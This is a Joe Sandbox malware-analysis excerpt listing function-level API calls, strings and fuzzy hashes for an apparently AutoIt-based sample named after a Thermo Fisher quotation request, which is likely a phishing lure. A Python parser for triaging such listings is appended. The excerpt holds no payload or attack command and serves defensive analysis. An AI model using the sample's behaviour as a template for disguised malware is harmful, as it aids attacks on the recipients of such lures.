                                                                • Part of subcall function 006213F1: _doexit.LIBCMT ref: 006213FB
                                                              Strings
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              • Opcode ID: db21813955b4836d80574ec405847e2ad8114388a54f94e718cbe4397a37b588
                                                              • Instruction ID: 6eaabd95ac0f5103e07482ca651d49728e80a9af5aa28cf31a2f1fc72f04587f
                                                              • Opcode Fuzzy Hash: db21813955b4836d80574ec405847e2ad8114388a54f94e718cbe4397a37b588
                                                              • Instruction Fuzzy Hash: CAD02B313C432833C31436983C17FC6364F8B15B51F040029BB0C955D259E285C013ED
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0067ACC0
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0067AEBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: DirectoryFreeLibrarySystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 510247158-3257408948
                                                              • Opcode ID: 092dcf50f858e8264563c9a9af38115811b4cc13706e55b797bc7dda4ea6bc39
                                                              • Instruction ID: 30b0cfe4ec507ea341c8dd2012aa2a8203545bbfc1652870db56aafdf244b56f
                                                              • Opcode Fuzzy Hash: 092dcf50f858e8264563c9a9af38115811b4cc13706e55b797bc7dda4ea6bc39
                                                              • Instruction Fuzzy Hash: DFE06D70C00209FFCB16DBE4D9849ECB7BAAB88301F14D286E106B2260CB304A85DF32
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006686E2
                                                              • PostMessageW.USER32(00000000), ref: 006686E9
                                                                • Part of subcall function 00647A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: b6fb85a98f8522bb861eaa096b2606f25465714e6fe44ec40309fb094262819d
                                                              • Instruction ID: 7cd8d34bab31d27cc32e184c15f336b1039ce8d63cffea22f9d78440fd68ada7
                                                              • Opcode Fuzzy Hash: b6fb85a98f8522bb861eaa096b2606f25465714e6fe44ec40309fb094262819d
                                                              • Instruction Fuzzy Hash: D7D012723853287BF3746770AC0BFC67B1A9B04B21F111A19B745EA1D0C9E4E980C769
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006686A2
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006686B5
                                                                • Part of subcall function 00647A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 17c4818fbed9f3eab0a48999b63713dbaf65b76a22ec64facfb96dea2bb77042
                                                              • Instruction ID: b1a62d3b77822d52fbf46693795b0c18f4589042fcfc29d99a3b4a0d66fc9e78
                                                              • Opcode Fuzzy Hash: 17c4818fbed9f3eab0a48999b63713dbaf65b76a22ec64facfb96dea2bb77042
                                                              • Instruction Fuzzy Hash: 1FD01272394328B7E3746770AC0BFD67B1A9B04B21F111A19B749AA1D0C9E4E980C765
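The function listing above is repetitive by design: every block repeats the same dump-source lines, and the two Shell_TrayWnd functions share one "API String ID" (529655941-2988720461) while differing only in a handful of positions of their instruction fuzzy hash. The following parser is an added example (not part of the Joe Sandbox report and not Joe Sandbox code) that reads blocks in this layout, groups functions by "API String ID", and flags functions that look up the taskbar window with FindWindowW(Shell_TrayWnd) and then PostMessageW to it. The sample input is constructed from three of the blocks above with the dump-source lines shortened and a placeholder snapshot file name; WM_COMMAND = 0x0111 is the documented Win32 message ID, the meaning of the 0x197 command ID is not asserted, and the positional fuzzy-hash comparison is a deliberately simple heuristic, not the metric Joe Sandbox uses.

```python
"""Triage helper for Joe Sandbox per-function listings (added example,
not part of the report).  A block starts at an "APIs" header and ends
with the "Instruction Fuzzy Hash" bullet of its "Similarity" section."""
import re
from collections import defaultdict

# One bullet of the "APIs" section: optional subcall prefix, API.MODULE,
# optional argument list, and the trailing "ref:" address.
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9_]+)(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
# Any other "• Key: value" bullet (Similarity fields, dump source, ...).
FIELD_RE = re.compile(r"•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

WM_COMMAND = 0x0111  # Win32 WM_COMMAND; the message seen in the listing

# Constructed sample: three blocks copied from the listing (dump-source
# lines shortened, snapshot file name is a placeholder).
SAMPLE = """\
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0063A63F
  • Part of subcall function 006213F1: _doexit.LIBCMT ref: 006213FB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_sample.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: db21813955b4836d80574ec405847e2ad8114388a54f94e718cbe4397a37b588
• Instruction Fuzzy Hash: CAD02B313C432833C31436983C17FC6364F8B15B51F040029BB0C955D259E285C013ED
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006686E2
• PostMessageW.USER32(00000000), ref: 006686E9
  • Part of subcall function 00647A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647AD0
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: b6fb85a98f8522bb861eaa096b2606f25465714e6fe44ec40309fb094262819d
• Instruction Fuzzy Hash: D7D012723853287BF3746770AC0BFC67B1A9B04B21F111A19B745EA1D0C9E4E980C769
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006686A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006686B5
  • Part of subcall function 00647A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647AD0
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 17c4818fbed9f3eab0a48999b63713dbaf65b76a22ec64facfb96dea2bb77042
• Instruction Fuzzy Hash: 1FD01272394328B7E3746770AC0BFD67B1A9B04B21F111A19B749AA1D0C9E4E980C765
"""


def parse_entries(text):
    """Split the listing into per-function dicts: {"calls": [...], "fields": {...}}."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":            # every function block opens with this header
            cur = {"calls": [], "fields": {}}
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue                  # section headers such as "Strings", "Similarity"
        m = CALL_RE.match(line)
        if m:
            args = m.group("args")
            cur["calls"].append({"api": m.group("api"), "module": m.group("mod"),
                                 "args": args.split(",") if args else [],
                                 "ref": m.group("ref"), "subcall": m.group("sub")})
            continue
        m = FIELD_RE.match(line)
        if m:
            cur["fields"][m.group("key")] = m.group("val")
    return entries


def group_by_api_string_id(entries):
    """Collapse functions that Joe Sandbox already considers API/string-identical."""
    groups = defaultdict(list)
    for e in entries:
        groups[e["fields"].get("API String ID", "?")].append(e)
    return dict(groups)


def taskbar_message(entry):
    """(message, wParam) of a PostMessageW to Shell_TrayWnd, or None when the
    function does not target the taskbar or the sandbox recovered no arguments."""
    if not any(c["api"] == "FindWindowW" and "Shell_TrayWnd" in c["args"] for c in entry["calls"]):
        return None
    for c in entry["calls"]:
        if c["api"] == "PostMessageW" and len(c["args"]) >= 3:
            try:
                return int(c["args"][1], 16), int(c["args"][2], 16)
            except ValueError:        # argument shown as "?" (unrecovered)
                return None
    return None


def fuzzy_hash_agreement(a, b):
    """Fraction of positions at which two equal-length fuzzy hashes agree
    (assumption: a crude positional heuristic, not Joe Sandbox's metric)."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a, b)) / len(a)


if __name__ == "__main__":
    for sid, members in group_by_api_string_id(parse_entries(SAMPLE)).items():
        print(f"API String ID {sid}: {len(members)} function(s)")
        for e in members:
            refs = ", ".join(c["ref"] for c in e["calls"] if c["subcall"] is None)
            msg = taskbar_message(e)
            note = f"  -> posts 0x{msg[0]:X} wParam=0x{msg[1]:X} to Shell_TrayWnd" if msg else ""
            print(f"  {e['fields'].get('Opcode ID', '?')[:16]}  calls at {refs}{note}")
```

Run against the whole report text rather than SAMPLE, the grouping shows which "API String ID" buckets hold dozens of runtime stubs (AutoIt error handlers, library loaders) and which hold the few functions worth opening in the disassembler; the fuzzy-hash comparison separates true duplicates from variants that merely share the same strings.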